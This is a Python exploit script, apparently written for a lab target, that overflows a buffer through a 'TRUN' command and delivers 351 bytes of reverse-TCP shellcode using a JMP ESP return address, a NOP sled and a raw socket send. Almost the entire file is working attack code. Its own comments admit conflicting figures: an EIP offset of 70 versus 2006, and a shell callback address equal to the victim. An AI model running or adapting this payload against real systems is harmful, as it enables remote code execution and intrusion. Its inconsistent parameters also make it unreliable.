#!/usr/bin/python
import socket
# Fuzzing note: the cyclic pattern below was sent to the remote host to locate the EIP offset. The note here records 70, but the exploit body uses a 2006-byte filler before the return address -- confirm which figure is current before reusing this.
# unique_pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9
# Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
# Known bad chars (excluded when the shellcode was generated): \x00 \x0a \x0d
# Reverse TCP shell, LHOST=10.1.5.40, LPORT=443. NOTE: LHOST is the same address as the target connected to below; a reverse shell normally calls back to the attacking host -- verify the shellcode was generated for the intended listener.
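# Reverse TCP shell (LHOST=10.1.5.40 / LPORT=443), 351 bytes, generated with
# the bad characters \x00 \x0a \x0d excluded.  Stored as bytes so the script
# behaves the same under Python 2 and Python 3.
# NOTE(review): LHOST here equals TARGET_HOST below, i.e. the shell would call
# back to the victim itself; regenerate for the attacking host if that is not
# what is intended.
shellcode = (
    b"\xbb\x88\x9d\xb7\x3d\xda\xd8\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    b"\x52\x83\xe8\xfc\x31\x58\x0e\x03\xd0\x93\x55\xc8\x1c\x43\x1b"
    b"\x33\xdc\x94\x7c\xbd\x39\xa5\xbc\xd9\x4a\x96\x0c\xa9\x1e\x1b"
    b"\xe6\xff\x8a\xa8\x8a\xd7\xbd\x19\x20\x0e\xf0\x9a\x19\x72\x93"
    b"\x18\x60\xa7\x73\x20\xab\xba\x72\x65\xd6\x37\x26\x3e\x9c\xea"
    b"\xd6\x4b\xe8\x36\x5d\x07\xfc\x3e\x82\xd0\xff\x6f\x15\x6a\xa6"
    b"\xaf\x94\xbf\xd2\xf9\x8e\xdc\xdf\xb0\x25\x16\xab\x42\xef\x66"
    b"\x54\xe8\xce\x46\xa7\xf0\x17\x60\x58\x87\x61\x92\xe5\x90\xb6"
    b"\xe8\x31\x14\x2c\x4a\xb1\x8e\x88\x6a\x16\x48\x5b\x60\xd3\x1e"
    b"\x03\x65\xe2\xf3\x38\x91\x6f\xf2\xee\x13\x2b\xd1\x2a\x7f\xef"
    b"\x78\x6b\x25\x5e\x84\x6b\x86\x3f\x20\xe0\x2b\x2b\x59\xab\x23"
    b"\x98\x50\x53\xb4\xb6\xe3\x20\x86\x19\x58\xae\xaa\xd2\x46\x29"
    b"\xcc\xc8\x3f\xa5\x33\xf3\x3f\xec\xf7\xa7\x6f\x86\xde\xc7\xfb"
    b"\x56\xde\x1d\xab\x06\x70\xce\x0c\xf6\x30\xbe\xe4\x1c\xbf\xe1"
    b"\x15\x1f\x15\x8a\xbc\xda\xfe\xbf\x41\xe1\xd7\xd7\x43\xe9\x26"
    b"\x93\xcd\x0f\x42\xf3\x9b\x98\xfb\x6a\x86\x52\x9d\x73\x1c\x1f"
    b"\x9d\xf8\x93\xe0\x50\x09\xd9\xf2\x05\xf9\x94\xa8\x80\x06\x03"
    b"\xc4\x4f\x94\xc8\x14\x19\x85\x46\x43\x4e\x7b\x9f\x01\x62\x22"
    b"\x09\x37\x7f\xb2\x72\xf3\xa4\x07\x7c\xfa\x29\x33\x5a\xec\xf7"
    b"\xbc\xe6\x58\xa8\xea\xb0\x36\x0e\x45\x73\xe0\xd8\x3a\xdd\x64"
    b"\x9c\x70\xde\xf2\xa1\x5c\xa8\x1a\x13\x09\xed\x25\x9c\xdd\xf9"
    b"\x5e\xc0\x7d\x05\xb5\x40\x8d\x4c\x97\xe1\x06\x09\x42\xb0\x4a"
    b"\xaa\xb9\xf7\x72\x29\x4b\x88\x80\x31\x3e\x8d\xcd\xf5\xd3\xff"
    b"\x5e\x90\xd3\xac\x5f\xb1"
)

# Bytes the target must never see inside the payload (they truncate or mangle
# the input); the assembled buffer is checked against this list before sending
# so a bad return address or sled is caught locally rather than on the target.
BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")

# The vulnerable command; everything after it is copied into the overflowing
# buffer.
cmd = b"TRUN ."
# Number of filler bytes before the saved return address is overwritten.
# NOTE(review): the header of this file says the offset was found at 70, which
# does not match this value -- 2006 is what the exploit body actually used.
EIP_OFFSET = 2006
# 625011AF  FFE4  JMP ESP, written little-endian.  Only valid while the module
# holding it loads at the same base (no ASLR / rebasing); re-verify it against
# the target build before relying on it.
ret_addr = b"\xaf\x11\x50\x62"
# Short NOP sled so a slightly different ESP still lands inside the shellcode.
nop_sled = b"\x90" * 16
# Largest input the server accepts (per the original analysis).  The payload
# is padded to exactly this size so the overflow is identical on every run.
MAX_LEN = 3000
TARGET_HOST = "10.1.5.40"
TARGET_PORT = 80


def _check_bad_chars(data, bad_chars=BAD_CHARS):
    """Raise ValueError if *data* contains any byte sequence from *bad_chars*."""
    for bad in bad_chars:
        if bad in data:
            raise ValueError("payload contains bad char %r" % (bad,))


def build_payload(eip_offset=EIP_OFFSET, ret=ret_addr, sled=nop_sled,
                  code=shellcode, max_len=MAX_LEN, pad=b"C"):
    """Assemble the overflow buffer: filler + ret + NOP sled + shellcode + padding.

    The padding is computed from the real length of each component rather than
    from hard-coded counts, so the result is always exactly *max_len* bytes and
    changing the sled or shellcode cannot silently push the buffer past the
    server's limit.

    Args:
        eip_offset: filler bytes before the saved return address.
        ret: 4-byte little-endian address that replaces the return address.
        sled: NOP bytes placed where ESP points after the jump.
        code: shellcode appended after the sled.
        max_len: total size of the returned buffer.
        pad: byte used to fill up to *max_len*.

    Returns:
        bytes of length *max_len*.

    Raises:
        ValueError: if the fixed parts alone exceed *max_len*, or if the
            assembled buffer contains one of BAD_CHARS.
    """
    body = b"A" * eip_offset + ret + sled + code
    if len(body) > max_len:
        raise ValueError("payload too long: %d > %d" % (len(body), max_len))
    payload = body + pad * (max_len - len(body))
    _check_bad_chars(payload)
    return payload


def send_payload(host=TARGET_HOST, port=TARGET_PORT, payload=None,
                 command=cmd, timeout=10.0):
    """Connect to the target, consume its banner and deliver the exploit.

    sendall() is used so a short write cannot silently truncate the buffer,
    and a socket timeout keeps a hung target from blocking forever.  The
    socket is closed on every path.

    Args:
        host, port: target address.
        payload: overflow buffer; built with build_payload() when None.
        command: command prefix sent before the payload.
        timeout: socket timeout in seconds for connect/recv/send.

    Raises:
        socket.error / socket.timeout on network failure.
    """
    if payload is None:
        payload = build_payload()
    sock = socket.create_connection((host, port), timeout)
    try:
        sock.recv(1024)  # banner; its content is not needed
        sock.sendall(command + payload + b"\r\n")
    finally:
        sock.close()


if __name__ == "__main__":
    print("Sending Evil Buffer!")
    send_payload()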